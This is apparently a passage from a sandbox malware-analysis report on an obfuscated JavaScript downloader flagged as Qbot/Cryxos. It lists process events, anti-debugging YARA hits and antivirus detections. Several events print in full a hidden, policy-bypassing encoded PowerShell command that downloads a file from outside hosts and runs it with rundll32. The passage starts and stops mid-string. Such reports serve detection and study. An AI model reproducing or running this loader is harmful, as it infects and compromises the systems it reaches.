QBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA="

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 18, 2023, 9:25 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\Users\test22\AppData\Local\Temp\Xpksf.js" Aquaphobia araneiformDustheap Denumeral AntipneumococcicNesotragus filepath: wscript	1	1
CreateProcessInternalW May 18, 2023, 9:25 a.m.	thread_identifier: 2368 thread_handle: 0x00000334 process_identifier: 2372 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7ACQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA=" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000033c	1	1
ShellExecuteExW May 18, 2023, 9:25 a.m.	show_type: 0 filepath_r: powershell parameters: -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7ACQAbwByAGQAdQByAG8AdQBzAG4AZQBzAHMAVABvAHAAZQByAGQAbwBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB4AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADQAQQBBAD0APQB0AGQAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBjAGcAQgBqAEEARwBnAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwBrAEEAWQB3AEIASABBAEgASQBBAFkAUQBCAHUAQQBIAFkAQQBhAFEAQgBzAEEARwB3AEEAWgBRAEEAdQBBAEcAVQBBAGIAZwBCAG4AQQBHAGsAQQBiAGcAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYgBvAG8AawBiAGkAbgBkAGUAcgBBAHMAYwBlAHIAdABhAGkAbgBtAGUAbgB0ACAAPQAgACIASABvAGwAbwBzAGkAZABlACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAOAAxADQAMQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBWAEEAQgB5AEEARwBrAEEAWgB3AEIAbgBBAEcAVQBBAGMAZwBCAG0AQQBHAGsAQQBjAHcAQgBvAEEARQA4AEEAYwBnAEIAawBBAEcAOABBAGQAZwBCAHAAQQBHAEUAQQBiAGcAQQB1AEEARgBVAEEAYgBnAEIAcABBAEcAWQBBAGIAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEARwBVAEEAWgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAYQBkAHUAbAB0AGUAcgBpAHoAZQAgAD0AIAA5ADIAMwA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAEkAbgB2AGkAZwBvAHIAYQB0AG8AcgAgAD0AIAA5ADcANAA7AH0AfQAkAFUAbgBzAGUAZQBtAGwAeQAgAD0AIAA4ADMAMQA7AEEAbgBnAHUAbABhAHIAOwA=" filepath: powershell	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 18, 2023, 9:25 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

File has been identified by 16 AntiVirus engines on VirusTotal as malicious (16 events)

Cyren	JS/Qbot.I!Eldorado
Symantec	ISB.Downloader!gen63
Avast	JS:Obfuscated-GX [Drp]
BitDefender	JS:Trojan.Cryxos.12541
MicroWorld-eScan	JS:Trojan.Cryxos.12541
Emsisoft	JS:Trojan.Cryxos.12541 (B)
VIPRE	JS:Trojan.Cryxos.12541
FireEye	JS:Trojan.Cryxos.12541
GData	JS:Trojan.Cryxos.12541
Arcabit	JS:Trojan.Cryxos.D30FD
Microsoft	Trojan:Script/Sabsik.FL.B!ml
Google	Detected
ALYac	JS:Trojan.Cryxos.12541
MAX	malware (ai score=82)
Ikarus	Trojan.Script
AVG	JS:Obfuscated-GX [Drp]

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABCAHIAaQBkAGcAZQBiAG8AYQByAGQAIAA9ACAANwA0ADAAOwAkAGgAbwBtAG8AbAB5AHMAaQBzAE8AYwB0AGEAcgBjAGgAeQAgAD0AIAAzADUAOwAkAEIAcgBlAHQAZQBzAHMAZQBUAGgAZQBtAGUAcgAgAD0AIAAiAFMAeQBuAGMAZQBkACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADsAJAB2AGkAcABlAHIAbwB1AHMARgBpAHIAbQBhAG0AZQBuAHQAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBVAEEAYgBnAEIAdgBBAEgAVQBBAGEAUQBCAHMAQQBHAHcAQQBaAFEAQgAwAEEARgBBAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEARwBVAEEAYgBnAEIAMABBAEMANABBAGMAZwBCAGwAQQBHAE0AQQBhAFEAQgB3AEEARwBVAEEAYwB3AEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQB3AEEAQQA9AD0AUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBRAEEAPQBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAeQBBAEQASQBBAEwAZwBBADUAQQBEAGcAQQAiADsAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBADUAQQBEAEUAQQBMAHcAQgBZAEEARwA0AEEAWgBBAEEAdgBBAEQAWQBBAGEAQQBCAEQAQQBHADQAQQBjAEEAQgBWAEEARwA4AEEAWgBnAEEAPQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARwAwAEEAYwBBAEIAbgBBAEYAVQBBAFkAZwBCAHAAQQBIAEUAQQBuAFUAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBXAGcAQgA1AEEARABFAEEAUQBnAEIARABBAEcATQBBAFYAQQBCAHoAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AZwBlAG4AdABlAGUAbAB5ACAAaQBuACAAJAB1AG4AYgBsAHUAZgBmAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBuAFUAeQAiACkAIAB7ACQAUABvAGwAeQBtAGEAdABoAHMAVQBuAGQAZQByAGwAYQBwAHAAaQBuAGcAIAA9ACAAOAAzADcAOwB0AHIAeQAgAHsAJABoAHkAZAByAG8AbAB5AHoAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBVAEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBkAFEAQgB6AEEARQBRAEEAYQBRAEIAegBBAEgAQQBBAFoAUQBCAHYAQQBIAEEAQQBiAEEAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAEwAZwBCADAAQQBHADgAQQBiAHcAQgBzAEEASABNAEEASQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBHAFUAQQBhAFEAQgB5AEEARwBVAEEAWgBBAEIAVABBAEgAVQBBAGMAQQBCAGwAQQBIAEkAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEgAVQBBAGMAZwBCAGwAQQBIAFEAQQBMAGcAQgB3AEEARwBrAEEAWQB3AEIAMABBAEgAVQBBAGMAZwBCAGwAQQBIAE0AQQAiADsAJABwAHIAZQBhAGMAYwBvAG0AbQBvAGQAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQBuAGcAZQBuAHQAZQBlAGwAeQApACkAOwBpAHcAcgAgACQAcAByAGUAYQBjAGMAbwBtAG0AbwBkAGEAdABlACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVAByAGkAZwBnAGUAcgBmAGkAcwBoAE8AcgBkAG8AdgBpAGEAbgAuAFUAbgBpAGYAbABvAHcAZQByAGUAZAA7A